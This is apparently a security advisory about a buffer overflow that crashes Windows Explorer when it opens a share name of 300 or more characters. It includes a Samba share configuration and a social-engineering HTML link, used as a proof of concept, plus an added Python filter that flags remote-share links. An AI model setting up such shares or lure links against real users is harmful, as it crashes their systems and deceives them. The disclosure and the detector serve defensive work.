MS Explorer (explorer.exe) and MS Internet Explorer (IEXPLORE.EXE) are core pieces of Microsoft Windows operating systems. An unchecked buffer allows a malicious user to crash Microsoft Explorer by creating a long shared directory name and convincing the user to access it.
Credit:
The information has been provided by Rodrigo Gutierrez.
Vulnerable Systems:
MS Internet Explorer, MS Explorer (explorer.exe) on Platforms:
* Windows XP (All), Windows 2000 (All), Windows 98 (All), Windows ME (All)
* Windows 2003 not tested
In order to exploit this, an attacker must be able to get a user to connect to a malicious server that contains a share name equal to or longer than 300 characters.
Proof of Concept:
Windows will not allow you to create a share with such a long name, but Samba does. Once your Samba box is up and running, create a share in your smb.conf:
[A x 300]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung
Once the server is up, go to your Windows test box and open Start menu > Run > \\your.malicious.server.ip.
Plufff, explorer will crash.
Or by social engineering:
<a href="\\my.malicious.server.ip">Enter My 0day sploit archive l/p:n0ph33r</a>
Workaround:
In your network card settings, disable Client for Microsoft Networks until an official fix for this vulnerability is available.
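As a complement to the workaround, a mail or web filter can flag markup like the social-engineering link above before a user follows it. The following is an added example, not part of the original advisory; the function names, the attribute set and the sample hosts other than the advisory's own link are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Attributes whose value the client may resolve as a location (assumed set).
LINK_ATTRS = {"href", "src", "background"}

def smb_host(value):
    """Return the remote host a UNC or file: reference names, else None."""
    v = value.strip()
    if v.lower().startswith("file:"):
        rest = v[5:].replace("\\", "/")
        lead = len(rest) - len(rest.lstrip("/"))
        if lead < 2 or lead == 3:  # file:/path and file:///path are local
            return None
        path = rest.lstrip("/")
    elif v.startswith("\\\\"):  # raw UNC path, as in the advisory's link
        path = v[2:].replace("\\", "/")
    else:  # http(s), protocol-relative //host, relative paths
        return None
    host = path.split("/", 1)[0]
    return host if host and host.lower() != "localhost" else None

class UncLinkFinder(HTMLParser):
    """Collects (tag, attribute, host) for every reference to a remote share."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            host = smb_host(value) if name in LINK_ATTRS and value else None
            if host:
                self.hits.append((tag, name, host))

def find_smb_links(html):
    finder = UncLinkFinder()
    finder.feed(html)
    finder.close()
    return finder.hits

# Constructed sample; the first link is the one quoted in the advisory.
SAMPLE = r'''
<a href="\\my.malicious.server.ip">Enter My 0day sploit archive</a>
<img src="file://10.0.0.5/pics/a.gif">
<a href="file:///C:/docs/readme.txt">local file</a>
<script src="//cdn.example/app.js"></script>
'''

if __name__ == "__main__":
    print(find_smb_links(SAMPLE))
```

Protocol-relative `//host` URLs and local `file:///` paths are deliberately not reported, since neither makes the client contact a file server.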
Vendor Status:
Rodrigo Gutierrez notified the vendor at the beginning of 2002. According to the vendor's knowledge base article 322857, this vulnerability was supposed to be fixed in Windows XP Service Pack 1 and Windows 2000 SP4.